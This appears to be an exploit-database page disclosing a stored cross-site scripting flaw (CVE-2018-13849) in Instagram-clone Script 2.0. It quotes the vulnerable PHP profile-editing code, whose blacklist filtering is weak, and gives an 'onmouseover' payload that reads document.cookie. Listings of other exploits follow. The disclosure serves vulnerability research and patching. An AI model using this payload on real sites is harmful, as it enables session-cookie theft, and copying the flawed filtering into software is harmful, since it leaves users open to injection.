Menu

Search for hundreds of thousands of exploits

"Instagram-Clone Script 2.0 - Cross-Site Scripting"

Author

Exploit author

L0RD

Platform

Exploit platform

php

Release date

Exploit published date

2018-07-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
# Date: 2018-07-10
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# CVE: CVE-2018-13849
# Tested on: Kali linux

# POC : Persistent Cross site scripting :
# vulnerable file : edit_requests.php
# vulnerable code :

if (isset($_POST['username'])) {
      $username = preg_replace("#[<> ]#i", "", $_POST['username']);
      $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
      $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
      $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
      $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
      $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
      $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
      $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
      $website = preg_replace("#[<>]#i", "", $_POST['website']);
      $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
      $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
 $session = $_SESSION['id'];

      $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
      $array = array("mssg" => $m);
      echo json_encode($array);
    }

# We use this payload to bypass filter :
# Payload : 

"onmouseover=" alert(document.cookie)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-09-05 "Microsoft People 10.1807.2131.0 - Denial of service (PoC)" dos windows_x86-64 L0RD
2018-08-30 "Nord VPN 6.14.31 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-29 "NASA openVSP 3.16.1 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-27 "Firefox 55.0.3 - Denial of Service (PoC)" dos windows_x86-64 L0RD
2018-08-23 "Twitter-Clone 1 - 'code' SQL Injection" webapps php L0RD
2018-08-21 "Twitter-Clone 1 - 'userid' SQL Injection" webapps php L0RD
2018-08-21 "Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)" webapps php L0RD
2018-07-11 "Instagram-Clone Script 2.0 - Cross-Site Scripting" webapps php L0RD
2018-07-04 "ShopNx - Arbitrary File Upload" webapps php L0RD
2018-07-04 "Online Trade - Information Disclosure" webapps php L0RD
2018-06-18 "Joomla! Component Jomres 9.11.2 - Cross-Site Request Forgery (Add User)" webapps php L0RD
2018-06-12 "Joomla! Component EkRishta 2.10 - 'username' SQL Injection" webapps php L0RD
2018-06-07 "WampServer 3.0.6 - Cross-Site Request Forgery" webapps php L0RD
2018-06-03 "Smartshop 1 - Cross-Site Request Forgery" webapps php L0RD
2018-06-03 "Smartshop 1 - 'id' SQL Injection" webapps php L0RD
2018-05-29 "Facebook Clone Script 1.0.5 - Cross-Site Request Forgery" webapps php L0RD
2018-05-29 "Facebook Clone Script 1.0.5 - 'search' SQL Injection" webapps php L0RD
2018-05-28 "Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery" webapps php L0RD
2018-05-28 "Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery" webapps php L0RD
2018-05-28 "Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection" webapps php L0RD
2018-05-24 "Timber 1.1 - Cross-Site Request Forgery" webapps php L0RD
2018-05-23 "eWallet Online Payment Gateway 2 - Cross-Site Request Forgery" webapps php L0RD
2018-05-23 "Mcard Mobile Card Selling Platform 1 - SQL Injection" webapps php L0RD
2018-05-23 "Mobile Card Selling Platform 1 - Cross-Site Request Forgery" webapps php L0RD
2018-05-22 "Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting" webapps php L0RD
2018-05-22 "Zechat 1.5 - SQL Injection / Cross-Site Request Forgery" webapps php L0RD
2018-05-22 "iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php L0RD
2018-05-21 "Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities" webapps php L0RD
2018-05-21 "Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php L0RD
2018-05-21 "Private Message PHP Script 2.0 - Cross-Site Scripting" webapps php L0RD
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.